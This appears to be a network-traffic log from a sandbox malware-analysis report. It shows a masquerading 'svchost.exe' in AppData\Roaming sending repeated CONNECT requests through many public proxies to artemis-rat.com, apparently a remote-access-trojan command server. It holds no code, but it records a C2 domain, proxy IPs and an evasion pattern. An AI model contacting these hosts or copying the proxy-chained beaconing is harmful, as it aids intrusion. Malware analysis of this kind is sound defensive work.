Mar 9, 2024 13:14:31.405337095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.676918983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.029798031 CET	208	IN	HTTP/1.0 404 Not Found Server: HCS Date: Sat, 09 Mar 2024 15:01:58 GMT Content-Type: text/html Content-Length: 432 HCS-Error: ERR_FTP_NOT_FOUND 0 X-NGAA: MISS from CH-XW-NO1-315.4 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2706	192.168.2.5	58221	72.210.221.197	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.406407118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2707	192.168.2.5	58852	18.169.83.87	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.409641981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.746346951 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:31 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2708	192.168.2.5	58831	103.23.100.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.410772085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2709	192.168.2.5	55836	91.134.140.160	56495	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.419378996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2710	192.168.2.5	58850	86.107.178.109	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.419811010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.146028996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.146337986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.942883015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.646291971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2711	192.168.2.5	58834	62.171.131.101	1629	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.454416990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.333336115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.442985058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.646370888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2712	192.168.2.5	58501	117.160.250.163	8828	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.454416990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.169630051 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:31 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2713	192.168.2.5	58867	104.21.31.189	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.454619884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.611849070 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2714	192.168.2.5	58836	8.222.164.205	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.455480099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2715	192.168.2.5	58830	212.108.155.205	9090	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.455482960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2716	192.168.2.5	58845	34.92.12.210	9238	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.455708027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.767107964 CET	28	IN	HTTP/1.1 502 Bad Gateway

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2717	192.168.2.5	56180	147.124.212.31	36779	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.468008995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.177550077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2718	192.168.2.5	58025	144.91.66.30	58285	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.481755972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.548044920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.677499056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2719	192.168.2.5	55978	47.90.126.78	8118	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.494997978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.373872042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2720	192.168.2.5	57974	60.188.102.225	18080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.495166063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2721	192.168.2.5	58909	192.154.244.92	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.496018887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2722	192.168.2.5	58915	172.67.181.97	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.502851009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.667850971 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2723	192.168.2.5	58929	104.16.105.106	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.510118961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.670737028 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2724	192.168.2.5	58891	107.180.90.88	8078	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.513753891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.145921946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.833856106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.146292925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.646251917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2725	192.168.2.5	58945	172.67.182.96	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.514484882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.671344042 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2726	192.168.2.5	57951	45.11.95.165	5219	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.521794081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2727	192.168.2.5	58017	72.49.49.11	31034	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.522517920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2728	192.168.2.5	59008	104.16.221.57	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.569232941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.067831039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.229126930 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2729	192.168.2.5	59010	172.67.25.204	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.569569111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.145816088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.306216002 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2730	192.168.2.5	58148	92.204.134.38	56177	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.571233988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2731	192.168.2.5	58973	148.72.23.56	4833	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.580399990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.176825047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.816102982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.177535057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.761169910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2732	192.168.2.5	58968	94.131.64.94	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.590739012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
